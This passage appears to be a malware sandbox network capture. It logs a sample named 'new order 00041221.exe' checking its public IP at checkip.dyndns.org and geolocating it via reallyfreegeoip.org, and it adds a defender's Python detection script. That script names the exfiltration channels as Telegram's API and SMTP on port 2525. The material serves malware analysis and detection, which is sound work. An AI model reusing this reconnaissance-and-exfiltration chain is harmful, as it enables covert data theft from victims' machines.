    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 26, 2024 09:03:14.185848951 CEST | 730 | IN | HTTP/1.1 502 Bad Gateway
    Date: Fri, 26 Jul 2024 07:03:13 GMT
    Content-Type: text/html
    Content-Length: 547
    Connection: keep-alive
    X-Request-ID: a3f7163b6b7b98234329adf6a7a6dd02
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49711 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:14.186454058 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:16.051285028 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:15 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 7e66601a04b3ca8c663f0f89844bbb2b
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49713 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:16.791847944 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:19.046257019 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:18 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: c433cb32213b27bced85e6c7690a7e15
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49715 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:19.643990040 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:22.177618027 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:22 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: bad16ef1c39a0358339d7fbc0cf3320f
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49718 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:22.834057093 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:23.482217073 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:23 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2b16581569354b0fb4a31ffa5dc1ea7f
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49722 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:24.147607088 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:26.356765985 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:26 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 6fca81094665b7ca7a73719ee3da7999
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


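The sessions of PID 5292 show the chain a defender can key on: repeated external-IP lookups against checkip.dyndns.org with a fixed, legacy User-Agent, then (in the HTTPS session that follows) a geolocation query for that same address with no User-Agent at all, then the exfiltration channels the packet table records, api.telegram.org on 443 and SMTP to mail.moonbrosurgical.com on port 2525. The correlation check below is an added example, not code from this report or from Joe Sandbox. Only the User-Agent string, hostnames, ports and the returned address 8.46.123.33 come from the report; the host and port lists, the Event records and the second PID are constructed for illustration, and a real deployment would extend the lists with its own indicators.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Indicators. The UA string is the one this sample sent; the host/port sets are
# assumptions seeded from this report and meant to be extended by the analyst.
UA_IPCHECK = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org"}
EXFIL_PORTS = {2525}            # SMTP on a non-standard port, as in this capture
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Event:
    """One request or connection as a sensor would record it (constructed, see SAMPLE)."""
    ts: str                     # HH:MM:SS on one day, so lexicographic order is time order
    pid: int
    host: str
    port: int
    path: str = ""
    ua: Optional[str] = None    # None: the request carried no User-Agent header
    body: str = ""              # response body, when the sensor captured it


@dataclass
class Chain:
    public_ip: Optional[str] = None
    stages: list = field(default_factory=list)


def analyse(events):
    """Per PID: ip-check -> geoip lookup of that same IP -> exfil channel, in time order."""
    chains = {}
    for ev in sorted(events, key=lambda e: e.ts):
        c = chains.setdefault(ev.pid, Chain())
        if ev.host in IP_CHECK_HOSTS and c.public_ip is None:
            m = IPV4.search(ev.body)            # "Current IP Address: 8.46.123.33"
            if m:
                c.public_ip = m.group(0)
                c.stages.append(("ip_check", ev.host,
                                 "legacy_ua" if ev.ua == UA_IPCHECK else "other_ua"))
        elif ev.host in GEOIP_HOSTS and c.public_ip and c.public_ip in ev.path:
            # The address learned in stage one reappears in the request path.
            c.stages.append(("geoip_own_ip", ev.host, "no_ua" if ev.ua is None else "ua"))
        elif (ev.host in EXFIL_HOSTS or ev.port in EXFIL_PORTS) and \
                any(s[0] == "geoip_own_ip" for s in c.stages):
            c.stages.append(("exfil", ev.host, ev.port))
    return chains


def verdict(chain):
    names = [s[0] for s in chain.stages]
    if names[:2] == ["ip_check", "geoip_own_ip"] and "exfil" in names:
        return "keylogger-style exfil chain"
    return "incomplete"


# Constructed sample: the four contacts of PID 5292 from this report, plus a
# made-up PID 4100 that only checks its public IP with an ordinary browser UA.
SAMPLE = [
    Event("09:03:05", 5292, "checkip.dyndns.org", 80, "/", UA_IPCHECK,
          "<html><head><title>Current IP Check</title></head>"
          "<body>Current IP Address: 8.46.123.33</body></html>"),
    Event("09:03:07", 5292, "reallyfreegeoip.org", 443, "/xml/8.46.123.33", None,
          "<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode></Response>"),
    Event("09:03:27", 5292, "api.telegram.org", 443),
    Event("09:03:34", 5292, "mail.moonbrosurgical.com", 2525),
    Event("09:03:06", 4100, "checkip.dyndns.org", 80, "/", "Mozilla/5.0",
          "<html><body>Current IP Address: 8.46.123.33</body></html>"),
]

if __name__ == "__main__":
    for pid, chain in analyse(SAMPLE).items():
        print(pid, verdict(chain), chain.stages)
```

The point of keying on the address rather than on the hostnames alone is that a visit to an IP-check site by itself is common and benign; the link worth alerting on is the same process taking the address it was just told and sending it to a geolocation service, then opening an outbound channel that legitimate software on a workstation rarely uses.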
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.7 | 49703 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:07 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:07 UTC | 704 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:07 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: EXPIRED
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo6T9Xk%2FbanT8mJ%2B%2Bozmxss9QR0BU0tCU38%2FIocpTwcY1HzMI35J9KEuyQT47wA2B5ZkK1lZSebjKU%2FGj%2F8yVNnA4jY31X2O9gZWjhnbkYkX9lx9WceHzgkyoiTIlDd9ighI0yVP"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287304cc44217-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:07 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.7 | 49706 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:09 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-26 07:03:09 UTC | 706 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:09 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 2
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Fix3PF3YvxGDG4zP5L6TTvFBayGUAKKt6lWLNWhxvZ8xVqPruun9IYlEzTen%2FnZ35b%2BWCt%2Bgtg5NIoJTtOoGthUBId0cHsXR%2BsU6t9ORoNER0teUR6yuyxXv1btCc2scjctiY9h"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92873e9c4d7287-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:09 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.7 | 49709 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:11 UTC | 708 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:11 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 4
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVW56dG6%2BLE9l00J3Atql%2Bw%2F1wQDKDdS9F5qpKHzm2sORhq4q64cY96EpxFNu%2BxJ%2BaRtguc6NDZ9JICtNXrsxtM7mLCFB1rAB0lCI7SZOjELvjlvWuE%2FGO9oSJRdGlTdQNef1MVf"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a928746ba134276-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.7 | 49712 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:16 UTC | 702 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:16 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 9
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQmK01iuCwA116GaIi3A%2FhwASAuK2Vws9RXI0McMqQBWWSInGuTirLZd9y35zREowxrP1II%2BAL2c4pkF0NzbVmkZIcKRY5asucDq%2FYOt71aC9NDijnLaxBZ71Ir0Ojd6VbAeQ6VQ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287691ce60f4d-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:16 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.7 | 49714 | 188.114.97.3 | 443 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-26 07:03:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:19 UTC | 709 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:19 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 12
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlMHoaSH9TZgdldk%2Bymv2F1Ny60KsNGOKrSv%2BAk2WlH3IZ%2FO%2Fqo3tBw60HlRcuqccGze7EpjBIT8%2BWrVUurLBhkDz4tjaxZ%2Fs4uzkSOzNVLJcFpF347Qx2D8SOio2pCMleH7iTQU"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92877b4fa9558a-EWR
                                          alt-svc: h3=":443"; ma=86400
